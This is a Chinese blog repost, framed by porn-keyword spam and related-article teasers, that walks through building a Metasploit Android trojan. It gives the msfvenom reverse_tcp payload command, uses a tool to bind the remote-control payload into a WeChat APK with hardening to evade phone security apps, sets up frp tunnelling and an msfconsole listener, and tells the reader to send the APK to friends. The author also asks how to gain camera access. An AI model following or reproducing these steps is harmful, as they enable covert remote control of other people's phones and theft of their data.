国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Kali Linux使用MSF木馬入侵安卓手機(jī)

這篇具有很好參考價(jià)值的文章主要介紹了Kali Linux使用MSF木馬入侵安卓手機(jī)。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

聲明:

  1. 本文章僅做娛樂(lè)和學(xué)習(xí),切勿非法使用!!
  2. 本人技術(shù)一般,水平有限,如有不對(duì)請(qǐng)多多指正。

一、環(huán)境準(zhǔn)備

  1. Kali Linux
  2. 安卓手機(jī)一部(安卓11)

二、內(nèi)網(wǎng)穿透

要想玩的好,總不能本地玩自己吧,也得和周邊朋友開(kāi)個(gè)玩笑吧,所以就得做內(nèi)網(wǎng)穿透了,免費(fèi)內(nèi)網(wǎng)穿透可以看這位大佬的

CSDN博主「Lisa Cpolar」
我這邊用的是自己frp拿自己服務(wù)器做了內(nèi)網(wǎng)穿透
msf 馬反編譯,kali linux,linux,python

三、木馬生成并加到apk

直接用msf生成的apk打開(kāi)沒(méi)有內(nèi)容,安裝報(bào)毒,且目前的安卓11以上無(wú)法直接安裝,

msfvenom -p android/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口號(hào)> R > <文件名>.apk

網(wǎng)上大部分都是生成后對(duì)apk反編譯加馬,加簽名等等,這邊用這位大佬的python工具直接給apk加馬,把msf生成的安卓遠(yuǎn)控附加進(jìn)普通的app中,并進(jìn)行加固隱藏特征??梢岳@過(guò)常見(jiàn)的手機(jī)安全管家。
大佬GItHub
使安裝python3, Java環(huán)境.
使用python3生成apk文件, 需要指定msf遠(yuǎn)控鏈接的IP和端口.(本地的填本地kali的IP,做了內(nèi)網(wǎng)穿透填穿透后的公網(wǎng)地址和端口)

python main.py --lhost 192.168.0.106 --lport 1433  -n ../微信_(tái)7.0.22.apk

msf 馬反編譯,kali linux,linux,python

三、使用msfconsole加載handler.rc進(jìn)行服務(wù)端監(jiān)聽(tīng)

加馬完成后會(huì)在WorkDir文件夾下生成一個(gè)handler.rc文件,做了內(nèi)網(wǎng)穿透的把此文件里面的ip改為kali機(jī)的IP,端口改為做kali本地監(jiān)聽(tīng)公網(wǎng)的那個(gè)端口**(注意和上面那個(gè)端口的區(qū)別)**
然后使用msfconsole加載handler.rc進(jìn)行服務(wù)端監(jiān)聽(tīng)

msfconsole -r WorkDir/handler.rc

msf 馬反編譯,kali linux,linux,python

四、將apk發(fā)給目標(biāo)機(jī)安裝

請(qǐng)勿違法違規(guī)!
msf 馬反編譯,kali linux,linux,python

五、結(jié)束

對(duì)方安裝點(diǎn)擊就會(huì)被監(jiān)聽(tīng)到,help命令查看
msf 馬反編譯,kali linux,linux,python

六、問(wèn)題

現(xiàn)在手機(jī)基本都控制著不給權(quán)限,比如我用一個(gè)音樂(lè)軟件只有存儲(chǔ)和音頻權(quán)限,只能截圖,獲取安裝的軟件列表,打開(kāi)軟件之類的,要是想控制攝像頭就不行,軟件也會(huì)報(bào)錯(cuò),現(xiàn)在問(wèn)題就是沒(méi)辦法主動(dòng)獲取權(quán)限,只能由用戶授權(quán),而且大佬的加馬工具也不是所有軟件都能成功。
能力有限,水平一般,希望有辦法的大佬們指點(diǎn)一下。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-820800.html

到了這里,關(guān)于Kali Linux使用MSF木馬入侵安卓手機(jī)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • MSF生成木馬及木馬的簡(jiǎn)單使用

    MSF生成木馬及木馬的簡(jiǎn)單使用

    本文將介紹有關(guān)MSF木馬模塊的簡(jiǎn)單使用方式,介紹常見(jiàn)的幾種木馬生成方式,如有不對(duì)的地方,歡迎大家在評(píng)論區(qū)指正。 由于本文僅對(duì)部分模塊的簡(jiǎn)單使用進(jìn)行說(shuō)明,更多信息請(qǐng)參考官方網(wǎng)址MSFVENOM 環(huán)境配置說(shuō)明 在kali虛擬機(jī)中使用 msfvenom 命令,查看kali中是否安裝msfvenom模塊

    2023年04月09日
    瀏覽(29)
  • 利用MSF打包加固APK對(duì)安卓手機(jī)進(jìn)行控制

    利用MSF打包加固APK對(duì)安卓手機(jī)進(jìn)行控制

    由于經(jīng)典的MSF生成apk安裝包控制,版本較低,高版本安卓手機(jī)可能會(huì)出現(xiàn)版本不支持或無(wú)法使用的現(xiàn)象,而且apk無(wú)法正常使用,沒(méi)有圖形化界面,比較假。 相比于原始的msf遠(yuǎn)控,此版本app在進(jìn)行遠(yuǎn)控時(shí),被注入的app可以正常運(yùn)行,原始msf生成的app程序,只在桌面上有一個(gè)圖標(biāo)

    2024年01月16日
    瀏覽(22)
  • Kali Linux利用MSF滲透Windows11電腦

    Kali Linux利用MSF滲透Windows11電腦

    目錄 一、MSF簡(jiǎn)介 滲透環(huán)境 二、滲透流程 1.Kali Linux進(jìn)入Root模式 ?2.生成可執(zhí)行文件 3.運(yùn)行msfconsole命令 ?4.配置參數(shù) ?5.在靶機(jī)Windows11打開(kāi)可執(zhí)行文件 6.滲透 Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來(lái)生成后門的軟件。 MSFvenom是Msfpayloa

    2024年02月06日
    瀏覽(30)
  • kali安卓手機(jī)木馬遠(yuǎn)控

    kali安卓手機(jī)木馬遠(yuǎn)控

    得到kali本機(jī)IP,設(shè)置端口 利用msf payload模塊生成木馬 命令: msfvenom -p android/meterpreter/reverse_tcp ? lhost=192.168.174.129 lport=5555 R 1.apk 木馬生成后 開(kāi)啟我們的監(jiān)聽(tīng)模塊msfconsole 進(jìn)入控制端后,設(shè)置一個(gè)安卓的playload(之前使用過(guò)的) ? 設(shè)置監(jiān)聽(tīng)kali虛擬機(jī)的ip地址和端口號(hào)(與之前生

    2024年02月13日
    瀏覽(32)
  • MSF生成后門木馬

    前言 為了方便平時(shí)使用,記錄一下操作命令 注意: lhost 為本地地址, rhost 為目標(biāo)地址 1、??Windows 生成連接木馬 將木馬放到目標(biāo)服務(wù)器運(yùn)行 使用模塊連接我們的木馬 2、??Linux 使用 msfvenom 模塊生成連接木馬 x64生成64位的?? x86生成32位的?? elf 為可執(zhí)行的二進(jìn)制文件 若傳

    2024年02月06日
    瀏覽(22)
  • msf滲透練習(xí)-生成木馬控制window系統(tǒng)

    msf滲透練習(xí)-生成木馬控制window系統(tǒng)

    說(shuō)明: 本章內(nèi)容,僅供學(xué)習(xí),不要用于非法用途(做個(gè)好白帽) (一)生成木馬 命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.46?LPORT=4444?-e x86/shikata_ga_nai -f exe -o shell.exe -i 5 -p:設(shè)置payload,也就是要生成的可執(zhí)行文件的類型和功能,這里選擇的是Windows Meterpreter反向

    2024年02月08日
    瀏覽(34)
  • 我的MSF之Android木馬滲透的學(xué)習(xí)筆記

    我的MSF之Android木馬滲透的學(xué)習(xí)筆記

    免責(zé)聲明:以下內(nèi)容僅供學(xué)習(xí)參考,如果用于任何非法途徑,后果自負(fù),希望大家做一個(gè)遵紀(jì)守法的好公民,一起保護(hù)國(guó)家的的網(wǎng)絡(luò)安全?。?! 攻擊機(jī):kali 靶機(jī):Android 1.木馬制作 通過(guò) msfvenom 制作安卓木馬 2.開(kāi)啟http服務(wù) 在 kali 終端輸入以下命令開(kāi)啟http服務(wù) 3.靶機(jī)下載木馬

    2024年02月12日
    瀏覽(28)
  • 利用msf進(jìn)行內(nèi)網(wǎng)的木馬滲透詳細(xì)教程

    利用msf進(jìn)行內(nèi)網(wǎng)的木馬滲透詳細(xì)教程

    本文僅限學(xué)術(shù)交流,請(qǐng)勿用他人實(shí)踐 本文通過(guò)kali系統(tǒng)進(jìn)行內(nèi)網(wǎng)滲透。主機(jī) ip:172.20.10.14 靶機(jī)ip:172.20.10.3(win10)? 文章目錄 前言 一 準(zhǔn)備工作 二 進(jìn)行滲透 1.開(kāi)啟服務(wù):需要開(kāi)啟apache和postgresql服務(wù) 2.制作木馬文件,利用msf進(jìn)行滲透 總結(jié)? 提示:以下是本篇文章正文內(nèi)容,下

    2023年04月08日
    瀏覽(24)
  • 肥腸恐布--探索Kali Linux中的Metasploit Framework(MSF聽(tīng)說(shuō)腎透大佬經(jīng)常用)

    肥腸恐布--探索Kali Linux中的Metasploit Framework(MSF聽(tīng)說(shuō)腎透大佬經(jīng)常用)

    請(qǐng)注意,在使用Metasploit Framework進(jìn)行滲透測(cè)試和漏洞利用時(shí),務(wù)必遵守合法和授權(quán)的原則,此文僅供大家學(xué)習(xí)參考,請(qǐng)確保您獲得了適當(dāng)?shù)氖跈?quán),并遵守法律和合規(guī)性要求。非法使用和濫用導(dǎo)致嚴(yán)重的法律后果自負(fù)。 目錄 前言 一、什么是Metasploit Framework(MSF)? 二、Metaspl

    2024年02月15日
    瀏覽(37)
  • 記一次MSF永恒之藍(lán)入侵win7系統(tǒng)實(shí)驗(yàn)

    記一次MSF永恒之藍(lán)入侵win7系統(tǒng)實(shí)驗(yàn)

    ? 目錄 1.環(huán)境搭建 2.實(shí)驗(yàn)開(kāi)始 1# 保證兩個(gè)主機(jī)之間可以ping通 2# kali打開(kāi)msfconsole 3# 由于目標(biāo)為win7系統(tǒng),我們選擇永恒之藍(lán)漏洞攻擊(ms17-010) 4# 獲取目標(biāo)機(jī)cmd? 5# meterpreter基礎(chǔ)命令 攻擊源ip:192.168.193.130? ? ?#系統(tǒng):kali? ? ? 鏡像下載地址:點(diǎn)擊跳轉(zhuǎn) ?靶 機(jī)??ip:192.168.19

    2024年02月13日
    瀏覽(22)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包